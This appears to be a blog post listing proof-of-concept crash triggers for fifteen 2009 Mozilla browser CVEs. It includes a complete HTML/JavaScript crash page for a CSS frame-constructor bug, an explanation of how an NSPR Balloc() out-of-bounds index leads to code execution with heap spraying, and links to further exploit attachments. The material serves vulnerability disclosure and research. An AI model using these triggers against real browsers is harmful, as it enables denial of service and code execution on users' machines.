CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383
Complete list of Proof-of-Concept codes (crash triggers)
1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames
PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>
<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>
</div>
</body>
</html>
2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability
Secunia Research Details:
The s2b() function takes the total number of digits and determines the first number K for which : 1 <<>= (numdigits + 8)/9.
K is then passed to Balloc() to allocate memory. Balloc() dereferences the static "freelist" buffer of 16 elements using K as an index. If K is above 15, malformed pointers following the freelist array will be returned from Balloc().
#define Kmax 15 ... static Bigint *freelist[Kmax+1]; ... Balloc ..(k).. ... if (rv = freelist[k]) { <-- out of bounds freelist[k] = rv->next; } ... return rv;
For e.g. K = 17, a pointer to a limited heap buffer is returned from Balloc(), and used to hold the converted big number. This results in a heap-based buffer overflow, followed by a call to a function grabbed from a corrupted pointer to a virtual function table. This results in the execution of an arbitrary address when paired with heap spraying.PoC #1:
https://bugzilla.mozilla.org/attachment.cgi?id=400490
PoC #2 (Secunia):
https://bugzilla.mozilla.org/attachment.cgi?id=400493
PoC #3:
https://bugzilla.mozilla.org/attachment.cgi?id=406726
3. (CVE-2009-3375) Cross-origin data theft through document.getSelection()
PoC:
Select destination for iframe and select 'go'. Make a text selection and thehttps://bug503226.bugzilla.mozilla.org/attachment.cgi?id=387576
content should be displayed in an alert box.
4. (CVE-2009-3378) Crash while loading .ogg video
The oggplay_data_handle_theora_frame function (media/liboggplay/src/liboggplay/oggplay_data.c) in liboggplay attempts to reuse an earlier frame data structure upon encountering a decoding error for the first frame, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a crafted .ogg video file.
PoC:
https://bugzilla.mozilla.org/show_bug.cgi?id=500311
Crash PoC (Video)
5. (CVE-2009-3371) Crash with recursive web-worker calls
Use-after-free vulnerability allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively.
PoC:
https://bugzilla.mozilla.org/attachment.cgi?id=398496
This comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete